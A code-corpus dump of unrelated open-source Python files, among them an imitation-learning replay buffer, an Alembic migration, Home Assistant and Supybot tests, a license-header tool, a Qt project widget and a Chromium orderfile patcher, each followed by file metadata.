self.data = np.zeros((maxlen,) + shape, dtype=np.uint8)
print("Allocating data of size {} ...".format(self.data.shape))
self.data += 0
else:
self.data = np.zeros((maxlen,) + shape).astype(dtype)
# Daniel: avoid over-writing teacher samples.
self.teach_idx = 0
def __len__(self):
return self.length
def __getitem__(self, idx):
# Daniel: we shouldn't be calling this if it's using our DDPG/IMIT.
assert self.teach_idx == 0, \
'Something went wrong, why are we calling this method?'
if idx < 0 or idx >= self.length:
raise KeyError()
return self.data[(self.start + idx) % self.maxlen]
def get_batch(self, idxs):
#return self.data[(self.start + idxs) % self.maxlen]
# Daniel: seems like it's just fine to do this. It's the responsibility
# of the caller to call a valid set of indices. And we do that with
# randint in the memory class later. Here we avoid headaches with
# `self.start` because I restrict it to be at least the teach_idx.
return self.data[idxs]
def append(self, v, is_teacher=False):
if self.length < self.maxlen:
# We have space, simply increase the length.
self.length += 1
if is_teacher:
self.teach_idx += 1
elif self.length == self.maxlen:
# No space, "remove" the first item.
#self.start = (self.start + 1) % self.maxlen
self.start = max(self.teach_idx, (self.start + 1) % self.maxlen)
else:
# This should never happen.
raise RuntimeError()
self.data[(self.start + self.length - 1) % self.maxlen] = v
def array_min2d(x):
x = np.array(x)
if x.ndim >= 2:
return x
return x.reshape(-1, 1)
class Memory(object):
def __init__(self, limit, action_shape, observation_shape, dtype='float32',
do_valid=False):
"""Daniel: careful about RAM usage. See:
https://github.com/BerkeleyAutomation/baselines-fork/issues/9
For this we can assume that in the replay buffer, the teacher samples
come first, and are fixed ahead of time, so our 'starting' index for
adding into the replay buffer should be offset by this quantity.
"""
self.limit = limit
self.do_valid = do_valid
if self.do_valid:
self.valid_frac = 0.2
self.nb_valid_items = 0 # will adjust later
self.observations0 = RingBuffer(limit, shape=observation_shape, dtype=dtype)
self.actions = RingBuffer(limit, shape=action_shape)
self.nb_teach = 0
self.done_adding_teach = False
def sample(self, batch_size):
# Draw such that we always have a proceeding element.
# TODO(Daniel): the -2 doesn't make sense, we don't need a proceeding
# element because the next observation is in a separate ring buffer?? I
# think it should be nb_entries, so we are in practice not sampling the
# last two items in this replay buffer. I'm switching to -1, should do
# 0 later if I'm confident we're not ignoring anything else ...
if self.do_valid:
# If we're doing validation, which should NOT normally be true,
# ignore the first few items, which we assign to be in validation.
batch_idxs = np.random.randint(self.nb_valid_items,
self.nb_entries-1,
size=batch_size)
else:
batch_idxs = np.random.randint(self.nb_entries-1, size=batch_size)
obs0_batch = self.observations0.get_batch(batch_idxs)
action_batch = self.actions.get_batch(batch_idxs)
# Assume `x < self.nb_teach` (not equality!) is a teacher sample.
flag_teacher = (batch_idxs < self.nb_teach).astype(np.float32)
result = {
'obs0': array_min2d(obs0_batch),
'actions': array_min2d(action_batch),
'flag_teacher': array_min2d(flag_teacher),
}
return result
def append(self, obs0, action, is_teacher=False, training=True):
"""Keep separate copies of obs0, obs1. So it's not memory efficient.
"""
if not training:
return
if is_teacher:
assert not self.done_adding_teach, self.nb_teach
assert self.nb_teach < self.limit, self.nb_teach
self.nb_teach += 1
self.observations0.append(obs0, is_teacher)
self.actions.append(action, is_teacher)
def set_teacher_idx(self):
"""Call from IMIT so we do not over-write teacher data.
"""
self.done_adding_teach = True
def set_valid_idx(self):
"""Set the validation index.
"""
assert self.done_adding_teach
self.nb_valid_items = int(self.valid_frac * self.nb_entries)
@property
def nb_entries(self):
return len(self.observations0)
@property
def nb_teach_entries(self):
return self.nb_teach
@property
def nb_valid(self):
return self.nb_valid_items
def get_valid_obs(self, s_idx, e_idx):
"""Get a validation minibatch with fixed starting and ending indices.
"""
assert self.do_valid
batch_idxs = np.arange(s_idx, e_idx)
obs0_batch = self.observations0.get_batch(batch_idxs)
action_batch = self.actions.get_batch(batch_idxs)
result = {
'obs0': array_min2d(obs0_batch),
'actions': array_min2d(action_batch),
}
return result
| 38.04908 | 84 | 0.60803 | [
"MIT"
] | DanielTakeshi/baselines-fork | baselines/imit/memory.py | 6,202 | Python |
"""empty message
Revision ID: eb02de174736
Revises: c0de0819f9f0
Create Date: 2020-02-04 18:29:57.302993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'eb02de174736'
down_revision = 'c0de0819f9f0'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('Shows', 'name',
existing_type=sa.VARCHAR(),
nullable=False)
op.create_foreign_key(None, 'Shows', 'Venue', ['name'], ['name'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'Shows', type_='foreignkey')
op.alter_column('Shows', 'name',
existing_type=sa.VARCHAR(),
nullable=True)
# ### end Alembic commands ###
| 25.257143 | 69 | 0.644796 | [
"Apache-2.0"
] | nkatwesigye/project_furry | starter_code/migrations/versions/eb02de174736_.py | 884 | Python |
from jogo_banco import __version__
def test_version():
assert __version__ == '0.1.0'
| 15.166667 | 34 | 0.725275 | [
"Apache-2.0"
] | rafaelgarrafiel/jogo_banco | tests/test_jogo_banco.py | 91 | Python |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Add or check license header
Usuage:
- add the default license header to source files that do not contain a valid
license:
python license_header.py add
- check if every files has a license header
python license_header.py check
"""
import re
import os
import argparse
# the default apache license
_LICENSE = """Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License."""
# if a file contains any str in the list, then consider it has been licensed
_LICENSE_PATTERNS = ['Licensed to the Apache Software Foundation']
# the folders or files that will be ignored
_WHITE_LIST = ['R-package/',
'cub/',
'dlpack/',
'dmlc-core/',
'mshadow/',
'nnvm',
'ps-lite',
'src/operator/mkl/',
'cmake/Modules/FindJeMalloc.cmake',
'src/operator/special_functions-inl.h',
'src/operator/nn/pool.h',
'src/operator/contrib/psroi_pooling-inl.h',
'src/operator/contrib/nn/deformable_im2col.h',
'example/speech-demo/io_func/convert2kaldi.py',
'example/speech-demo/decode_mxnet.sh',
'example/image-classification/predict-cpp/image-classification-predict.cc',
'src/operator/contrib/ctc_include/',
'cmake/Modules/FindJeMalloc.cmake']
# language extensions and the according commment mark
_LANGS = {'.cc':'*', '.h':'*', '.cu':'*', '.cuh':'*', '.py':'#',
'.pm':'#', '.scala':'*', '.cc':'*', '.sh':'#', '.cmake':'#',
'.java':'*', '.sh':'#', '.cpp':'*', '.hpp':'*', '.c':'*',
'.bat':'rem', '.pl':'#'}
# Previous license header, which will be removed
_OLD_LICENSE = re.compile('.*Copyright.*by Contributors')
def _has_license(lines):
return any([any([p in l.decode('utf-8') for p in _LICENSE_PATTERNS]) for l in lines])
def _get_license(comment_mark):
if comment_mark == '*':
body = '/*\n'
else:
body = ''
for l in _LICENSE.split('\n'):
if comment_mark == '*':
body += ' '
body += comment_mark
if len(l):
body += ' ' + l
body += '\n'
if comment_mark == '*':
body += ' */\n'
body += '\n'
return body
def _valid_file(fname, verbose=False):
if any([l in fname for l in _WHITE_LIST]):
if verbose:
print('skip ' + fname + ', it matches the white list')
return False
_, ext = os.path.splitext(fname)
if ext not in _LANGS:
if verbose:
print('skip ' + fname + ', unknown file extension')
return False
return True
def process_file(fname, action, verbose=True):
if not _valid_file(fname, verbose):
return True
with open(fname, 'rb') as f:
lines = f.readlines()
if not lines:
return True
if _has_license(lines):
return True
elif action == 'check':
return False
_, ext = os.path.splitext(fname)
with open(fname, 'wb') as f:
# shebang line
if lines[0].startswith(b'#!'):
f.write(lines[0].rstrip()+b'\n\n')
del lines[0]
f.write(str.encode(_get_license(_LANGS[ext])))
for l in lines:
f.write(l.rstrip()+b'\n')
print('added license header to ' + fname)
return False
def process_folder(root, action):
excepts = []
for root, _, files in os.walk(root):
for f in files:
fname = os.path.normpath(os.path.join(root, f))
if not process_file(fname, action):
excepts.append(fname)
if action == 'check' and excepts:
raise Exception('The following files do not contain a valid license, '+
'you can use `python tools/license_header.py add` to add'+
'them automatically', excepts)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Add or check source license header')
parser.add_argument(
'action', nargs=1, type=str,
choices=['add', 'check'], default='add',
help = 'add or check')
args = parser.parse_args()
process_folder(os.path.join(os.path.dirname(__file__), '..'), args.action[0])
| 35.134969 | 90 | 0.624411 | [
"Apache-2.0"
] | GrassSunFlower/mxnet | tools/license_header.py | 5,727 | Python |
"""Test service helpers."""
import asyncio
from copy import deepcopy
import unittest
from unittest.mock import patch
# To prevent circular import when running just this file
import homeassistant.components # noqa
from homeassistant import core as ha, loader
from homeassistant.const import STATE_ON, STATE_OFF, ATTR_ENTITY_ID
from homeassistant.helpers import service, template
from homeassistant.setup import async_setup_component
import homeassistant.helpers.config_validation as cv
from tests.common import get_test_home_assistant, mock_service
class TestServiceHelpers(unittest.TestCase):
"""Test the Home Assistant service helpers."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.calls = mock_service(self.hass, 'test_domain', 'test_service')
def tearDown(self): # pylint: disable=invalid-name
"""Stop down everything that was started."""
self.hass.stop()
def test_template_service_call(self):
"""Test service call with templating."""
config = {
'service_template': '{{ \'test_domain.test_service\' }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ \'goodbye\' }}',
'data': {
'value': '{{ \'complex\' }}',
'simple': 'simple'
},
'list': ['{{ \'list\' }}', '2'],
},
}
service.call_from_config(self.hass, config)
self.hass.block_till_done()
self.assertEqual('goodbye', self.calls[0].data['hello'])
self.assertEqual('complex', self.calls[0].data['data']['value'])
self.assertEqual('simple', self.calls[0].data['data']['simple'])
self.assertEqual('list', self.calls[0].data['list'][0])
def test_passing_variables_to_templates(self):
"""Test passing variables to templates."""
config = {
'service_template': '{{ var_service }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ var_data }}',
},
}
service.call_from_config(self.hass, config, variables={
'var_service': 'test_domain.test_service',
'var_data': 'goodbye',
})
self.hass.block_till_done()
self.assertEqual('goodbye', self.calls[0].data['hello'])
def test_bad_template(self):
"""Test passing bad template."""
config = {
'service_template': '{{ var_service }}',
'entity_id': 'hello.world',
'data_template': {
'hello': '{{ states + unknown_var }}'
}
}
service.call_from_config(self.hass, config, variables={
'var_service': 'test_domain.test_service',
'var_data': 'goodbye',
})
self.hass.block_till_done()
self.assertEqual(len(self.calls), 0)
def test_split_entity_string(self):
"""Test splitting of entity string."""
service.call_from_config(self.hass, {
'service': 'test_domain.test_service',
'entity_id': 'hello.world, sensor.beer'
})
self.hass.block_till_done()
self.assertEqual(['hello.world', 'sensor.beer'],
self.calls[-1].data.get('entity_id'))
def test_not_mutate_input(self):
"""Test for immutable input."""
config = cv.SERVICE_SCHEMA({
'service': 'test_domain.test_service',
'entity_id': 'hello.world, sensor.beer',
'data': {
'hello': 1,
},
'data_template': {
'nested': {
'value': '{{ 1 + 1 }}'
}
}
})
orig = deepcopy(config)
# Only change after call is each template getting hass attached
template.attach(self.hass, orig)
service.call_from_config(self.hass, config, validate_config=False)
assert orig == config
@patch('homeassistant.helpers.service._LOGGER.error')
def test_fail_silently_if_no_service(self, mock_log):
"""Test failing if service is missing."""
service.call_from_config(self.hass, None)
self.assertEqual(1, mock_log.call_count)
service.call_from_config(self.hass, {})
self.assertEqual(2, mock_log.call_count)
service.call_from_config(self.hass, {
'service': 'invalid'
})
self.assertEqual(3, mock_log.call_count)
def test_extract_entity_ids(self):
"""Test extract_entity_ids method."""
self.hass.states.set('light.Bowl', STATE_ON)
self.hass.states.set('light.Ceiling', STATE_OFF)
self.hass.states.set('light.Kitchen', STATE_OFF)
loader.get_component(self.hass, 'group').Group.create_group(
self.hass, 'test', ['light.Ceiling', 'light.Kitchen'])
call = ha.ServiceCall('light', 'turn_on',
{ATTR_ENTITY_ID: 'light.Bowl'})
self.assertEqual(['light.bowl'],
service.extract_entity_ids(self.hass, call))
call = ha.ServiceCall('light', 'turn_on',
{ATTR_ENTITY_ID: 'group.test'})
self.assertEqual(['light.ceiling', 'light.kitchen'],
service.extract_entity_ids(self.hass, call))
self.assertEqual(['group.test'], service.extract_entity_ids(
self.hass, call, expand_group=False))
@asyncio.coroutine
def test_async_get_all_descriptions(hass):
"""Test async_get_all_descriptions."""
group = loader.get_component(hass, 'group')
group_config = {group.DOMAIN: {}}
yield from async_setup_component(hass, group.DOMAIN, group_config)
descriptions = yield from service.async_get_all_descriptions(hass)
assert len(descriptions) == 1
assert 'description' in descriptions['group']['reload']
assert 'fields' in descriptions['group']['reload']
logger = loader.get_component(hass, 'logger')
logger_config = {logger.DOMAIN: {}}
yield from async_setup_component(hass, logger.DOMAIN, logger_config)
descriptions = yield from service.async_get_all_descriptions(hass)
assert len(descriptions) == 2
assert 'description' in descriptions[logger.DOMAIN]['set_level']
assert 'fields' in descriptions[logger.DOMAIN]['set_level']
| 35.604396 | 75 | 0.603395 | [
"Apache-2.0"
] | DevRGT/home-assistant | tests/helpers/test_service.py | 6,480 | Python |
# ----------------------------------------------------------------
# ---------- ASSOCIATION RULE MINING : NOTEABLE ATTEMPT 2 ---------
# ----------------------------------------------------------------
# ------------------ DAILY DATASET --------------------
association_rules = apriori(dailyRankedCrimes.values, min_support=0.02, min_confidence=0.95, min_lift=3, min_length=4, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 17
# ------------------ YEARLY DATASET --------------------
association_rules = apriori(yearlyRankedCrimes.values, min_support=0.02, min_confidence=0.95, min_lift=3, min_length=4, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 2
# Not Many Rules, playing with the settings:
association_rules = apriori(yearlyRankedCrimes.values, min_support=0.0045, min_confidence=0.95, min_lift=1, min_length=2, use_colnames = True)
association_results = list(association_rules)
print(len(association_results))
# 41
# This is better
# I printed the Rules using the common commands (found in common-commands.py) | 37.866667 | 142 | 0.634683 | [
"MIT"
] | CraftingGamerTom/wsu-computer-science | CS-383_Cloud-Computing_2020-Spring/association-rule-mining/attempt2.py | 1,136 | Python |
# Copyright (c) 2013 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import sgtk
from tank.platform.qt import QtGui
from tank.platform.qt import QtCore
from . import project_model
views = sgtk.platform.import_framework("tk-framework-qtwidgets", "views")
class ProjectWidget(QtGui.QFrame):
""" Simple widget that shows a project's thumbnail and name. """
MARGIN = 5
ICON_SIZE = QtCore.QSize(32, 32)
def __init__(self, parent=None):
QtGui.QFrame.__init__(self, parent)
# initialize the UI
# simple frame with a thumbnail and a label
self.setObjectName("frame")
self.setFrameStyle(self.NoFrame)
self.setContentsMargins(self.MARGIN, self.MARGIN, self.MARGIN, self.MARGIN)
self.label = QtGui.QLabel(self)
self.label.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignLeft)
self.label.setWordWrap(True)
self.thumbnail = QtGui.QLabel(self)
self.thumbnail.setScaledContents(True)
self.layout = QtGui.QHBoxLayout(self)
self.layout.addWidget(self.thumbnail)
self.layout.addWidget(self.label)
self.layout.setStretchFactor(self.label, 1)
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
self.setVisible(False)
self.set_selected(False)
def set_thumbnail(self, pixmap):
scaled = pixmap.scaled(self.ICON_SIZE, QtCore.Qt.KeepAspectRatio)
self.thumbnail.setPixmap(scaled)
def set_text(self, label):
metrics = QtGui.QFontMetrics(self.label.font())
elided = metrics.elidedText(label, QtCore.Qt.ElideMiddle, self.label.width())
self.label.setText(elided)
self.setToolTip(label)
def set_selected(self, selected):
""" Update the styling to reflect if the widget is selected or not """
if selected:
p = QtGui.QPalette()
highlight_col = p.color(QtGui.QPalette.Active, QtGui.QPalette.Highlight)
transp_highlight_str = "rgba(%s, %s, %s, 25%%)" % \
(highlight_col.red(), highlight_col.green(), highlight_col.blue())
highlight_str = "rgb(%s, %s, %s)" % \
(highlight_col.red(), highlight_col.green(), highlight_col.blue())
# make a border around the cell
self.setStyleSheet(
"""#frame {
border-width: 2px;
border-color: %s;
border-style: solid;
background-color: %s;
}
""" % (highlight_str, transp_highlight_str))
else:
self.setStyleSheet(
"""#frame {
border-width: 2px;
border-color: transparent;
border-style: solid;
}""")
class ProjectDelegate(views.EditSelectedWidgetDelegate):
""" Wrapper around the ProjectWidget for delegate use """
def __init__(self, view):
views.EditSelectedWidgetDelegate.__init__(self, view)
def _create_widget(self, parent):
return ProjectWidget(parent)
def _on_before_paint(self, widget, model_index, style_options):
if (style_options.state & QtGui.QStyle.State_Selected):
widget.set_selected(True)
else:
widget.set_selected(False)
icon = model_index.data(QtCore.Qt.DecorationRole)
if icon is not None:
thumb = icon.pixmap(30)
widget.set_thumbnail(thumb)
widget.set_text(model_index.data(project_model.ProjectModel.DISPLAY_NAME_ROLE))
def _on_before_selection(self, widget, model_index, style_options):
self._on_before_paint(widget, model_index, style_options)
def sizeHint(self, style_options, model_index):
return QtCore.QSize(175, 2*ProjectWidget.MARGIN + ProjectWidget.ICON_SIZE.height())
| 36.724138 | 91 | 0.64507 | [
"MIT"
] | JoanAzpeitia/lp_sg | install/app_store/tk-framework-adminui/v0.1.6/python/setup_project/project_delegate.py | 4,260 | Python |
import unittest
from robotide.preferences.settings import SettingsMigrator
from robotide.utils import overrides
class SettingsMigrationTestCase(SettingsMigrator, unittest.TestCase):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
def setUp(self):
self._old_settings = {}
self._default_settings = lambda:0
self._from_0_to_1_called = False
self._from_1_to_2_called = False
self._merge_called = False
def test_migration_from_0_to_2(self):
self._old_settings[SettingsMigrator.SETTINGS_VERSION] = 0
self.migrate()
self.assertTrue(self._from_0_to_1_called)
self.assertTrue(self._from_1_to_2_called)
self.assertTrue(self._merge_called)
def test_migration_from_1_to_2(self):
self._old_settings[SettingsMigrator.SETTINGS_VERSION] = 1
self.migrate()
self.assertFalse(self._from_0_to_1_called)
self.assertTrue(self._from_1_to_2_called)
self.assertTrue(self._merge_called)
@overrides(SettingsMigrator)
def migrate_from_0_to_1(self, settings):
self.assertEqual(self._old_settings, settings)
self._from_0_to_1_called = True
settings[SettingsMigrator.SETTINGS_VERSION] = 1
@overrides(SettingsMigrator)
def migrate_from_1_to_2(self, settings):
self.assertEqual(self._old_settings, settings)
self._from_1_to_2_called = True
settings[SettingsMigrator.SETTINGS_VERSION] = 2
def merge(self):
self._merge_called = True
if __name__ == '__main__':
unittest.main()
| 33.163265 | 69 | 0.721231 | [
"ECL-2.0",
"Apache-2.0"
] | Acidburn0zzz/RIDE | utest/preferences/test_settings.py | 1,625 | Python |
###
# Copyright (c) 2003-2005, Daniel DiPaolo
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import time
from supybot.test import *
class NewsTestCase(ChannelPluginTestCase):
plugins = ('News','User')
def setUp(self):
ChannelPluginTestCase.setUp(self)
# Create a valid user to use
self.prefix = 'news!bar@baz'
self.irc.feedMsg(ircmsgs.privmsg(self.nick, 'register tester moo',
prefix=self.prefix))
m = self.irc.takeMsg() # Response to register.
def testAddnews(self):
self.assertNotError('add 0 subject: foo')
self.assertRegexp('news', 'subject')
self.assertNotError('add 0 subject2: foo2')
self.assertRegexp('news', 'subject.*subject2')
self.assertNotError('add 5 subject3: foo3')
self.assertRegexp('news', 'subject3')
print()
print('Sleeping to expire the news item (testAddnews)')
time.sleep(6)
print('Done sleeping.')
self.assertNotRegexp('news', 'subject3')
def testNews(self):
# These should both fail first, as they will have nothing in the DB
self.assertRegexp('news', 'no news')
self.assertRegexp('news #channel', 'no news')
# Now we'll add news and make sure listnews doesn't fail
self.assertNotError('add #channel 0 subject: foo')
self.assertNotError('news #channel')
self.assertNotError('add 0 subject: foo')
self.assertRegexp('news', '#1')
self.assertNotError('news 1')
def testChangenews(self):
self.assertNotError('add 0 Foo: bar')
self.assertNotError('change 1 s/bar/baz/')
self.assertNotRegexp('news 1', 'bar')
self.assertRegexp('news 1', 'baz')
def testOldnews(self):
self.assertRegexp('old', 'No old news')
self.assertNotError('add 0 a: b')
self.assertRegexp('old', 'No old news')
self.assertNotError('add 5 foo: bar')
self.assertRegexp('old', 'No old news')
print()
print('Sleeping to expire the news item (testOldnews)')
time.sleep(6)
print('Done sleeping.')
self.assertNotError('old')
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| 42.579545 | 79 | 0.681345 | [
"BSD-3-Clause"
] | ircpuzzles/competitionbot | plugins/News/test.py | 3,747 | Python |
from enum import Enum
class GeneClass(str, Enum):
PROTEIN_CODING = ("protein coding,nonsense mediated decay",)
PSEUDOGENE = "pseudogene,unprocessed pseudogene,polymorphic pseudogene,unitary pseudogene,transcribed unprocessed pseudogene,transcribed processed pseudogene, IG pseudogene"
MICRO_RNA = "micro RNA"
SHORT_NCRNA = (
"piRNA,rRNA,siRNA,snRNA,snoRNA,tRNA,scaRNA,vaultRNA,sRNA,misc RNA"
)
LONG_NCRNA = "lincRNA,macro IncRNA,prime3 overlapping ncrna,antisense,retained intron,sense intronic,sense overlapping,macro IncRNA,bidirectional IncRNA"
IMMUNOGLOBULIN = "IG C gene,IG D gene,IG J gene,IG V gene"
T_CELL_RECEPTOR = "TR C gene,TR J gene, TR V gene"
| 50 | 177 | 0.76 | [
"MIT"
] | lifeomic/phc-sdk-py | phc/easy/omics/options/gene_class.py | 700 | Python |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import json
import argparse
import numpy as np
parser = argparse.ArgumentParser(description="resnet inference")
parser.add_argument("--result_path", type=str, required=True, help="result files path.")
parser.add_argument("--label_path", type=str, required=True, help="image file path.")
args = parser.parse_args()
batch_size = 1
num_classes = 1000
def get_result(result_path, label_path):
"""calculate the result"""
files = os.listdir(result_path)
with open(label_path, "r") as label:
labels = json.load(label)
top1 = 0
top5 = 0
total_data = len(files)
for file in files:
img_ids_name = file.split('_0.')[0]
data_path = os.path.join(result_path, img_ids_name + "_0.bin")
result = np.fromfile(data_path, dtype=np.float16).reshape(batch_size, num_classes)
for batch in range(batch_size):
predict = np.argsort(-result[batch], axis=-1)
if labels[img_ids_name+".JPEG"] == predict[0]:
top1 += 1
if labels[img_ids_name+".JPEG"] in predict[:5]:
top5 += 1
print(f"Total data: {total_data}, top1 accuracy: {top1/total_data}, top5 accuracy: {top5/total_data}.")
if __name__ == '__main__':
get_result(args.result_path, args.label_path)
| 37.509434 | 107 | 0.666499 | [
"Apache-2.0"
] | mindspore-ai/models | research/cv/resnext152_64x4d/postprocess.py | 1,988 | Python |
from .checkpoints_evaluation import CheckpointsEvaluationControlFlow
from .controlflow import (
record_train_batch_stats,
record_validation_stats,
validation_round,
)
from .helpers import prepare_batch
__all__ = [
"CheckpointsEvaluationControlFlow",
"record_validation_stats",
"record_train_batch_stats",
"validation_round",
"prepare_batch",
]
| 23.5625 | 68 | 0.777188 | [
"Apache-2.0"
] | c4dt/mlbench-core | mlbench_core/controlflow/pytorch/__init__.py | 377 | Python |
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
""" Display accelerometer data once per second """
import time
import board
import adafruit_lsm303_accel
i2c = board.I2C() # uses board.SCL and board.SDA
sensor = adafruit_lsm303_accel.LSM303_Accel(i2c)
while True:
acc_x, acc_y, acc_z = sensor.acceleration
print(
"Acceleration (m/s^2): ({0:10.3f}, {1:10.3f}, {2:10.3f})".format(
acc_x, acc_y, acc_z
)
)
print("")
time.sleep(1.0)
| 22.956522 | 73 | 0.666667 | [
"MIT"
] | Yarik9008/SoftAcademic | libralli/circcuitpython/adafruit-circuitpython-bundle-7.x-mpy-20211225/examples/lsm303_accel_simpletest.py | 528 | Python |
#!/usr/bin/python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Patch an orderfile.
Starting with a list of symbols in a binary and an orderfile (ordered list of
symbols), matches the symbols in the orderfile and augments each symbol with the
symbols residing at the same address (due to having identical code).
Note: It is possible to have.
- Several symbols mapping to the same offset in the binary.
- Several offsets for a given symbol (because we strip the ".clone." suffix)
TODO(lizeb): Since the suffix ".clone." is only used with -O3 that we don't
currently use, simplify the logic by removing the suffix handling.
The general pipeline is:
1. Get the symbol infos (name, offset, size, section) from the binary
2. Get the symbol names from the orderfile
3. Find the orderfile symbol names in the symbols coming from the binary
4. For each symbol found, get all the symbols at the same address
5. Output them to an updated orderfile, with several different prefixes
"""
import collections
import logging
import optparse
import sys
import cygprofile_utils
import symbol_extractor
# Prefixes for the symbols. We strip them from the incoming symbols, and add
# them back in the output file.
_PREFIXES = ('.text.startup.', '.text.hot.', '.text.unlikely.', '.text.')
def _RemoveClone(name):
"""Return name up to the ".clone." marker."""
clone_index = name.find('.clone.')
if clone_index != -1:
return name[:clone_index]
return name
def _GroupSymbolInfos(symbol_infos):
"""Group the symbol infos by name and offset.
Args:
symbol_infos: an iterable of SymbolInfo
Returns:
The same output as _GroupSymbolInfosFromBinary.
"""
# Map the addresses to symbols.
offset_to_symbol_infos = collections.defaultdict(list)
name_to_symbol_infos = collections.defaultdict(list)
for symbol in symbol_infos:
symbol = symbol_extractor.SymbolInfo(name=_RemoveClone(symbol.name),
offset=symbol.offset,
size=symbol.size,
section=symbol.section)
offset_to_symbol_infos[symbol.offset].append(symbol)
name_to_symbol_infos[symbol.name].append(symbol)
return (dict(offset_to_symbol_infos), dict(name_to_symbol_infos))
def _GroupSymbolInfosFromBinary(binary_filename):
"""Group all the symbols from a binary by name and offset.
Args:
binary_filename: path to the binary.
Returns:
A tuple of dict:
(offset_to_symbol_infos, name_to_symbol_infos):
- offset_to_symbol_infos: {offset: [symbol_info1, ...]}
- name_to_symbol_infos: {name: [symbol_info1, ...]}
"""
symbol_infos = symbol_extractor.SymbolInfosFromBinary(binary_filename)
return _GroupSymbolInfos(symbol_infos)
def _StripPrefix(line):
"""Get the symbol from a line with a linker section name.
Args:
line: a line from an orderfile, usually in the form:
.text.SymbolName
Returns:
The symbol, SymbolName in the example above.
"""
line = line.rstrip('\n')
for prefix in _PREFIXES:
if line.startswith(prefix):
return line[len(prefix):]
return line # Unprefixed case
def _GetSymbolsFromStream(lines):
"""Get the symbols from an iterable of lines.
Filters out wildcards and lines which do not correspond to symbols.
Args:
lines: iterable of lines from an orderfile.
Returns:
Same as GetSymbolsFromOrderfile
"""
# TODO(lizeb): Retain the prefixes later in the processing stages.
symbols = []
unique_symbols = set()
for line in lines:
line = _StripPrefix(line)
name = _RemoveClone(line)
if name == '' or name == '*' or name == '.text':
continue
if not line in unique_symbols:
symbols.append(line)
unique_symbols.add(line)
return symbols
def GetSymbolsFromOrderfile(filename):
"""Return the symbols from an orderfile.
Args:
filename: The name of the orderfile.
Returns:
A list of symbol names.
"""
with open(filename, 'r') as f:
return _GetSymbolsFromStream(f.xreadlines())
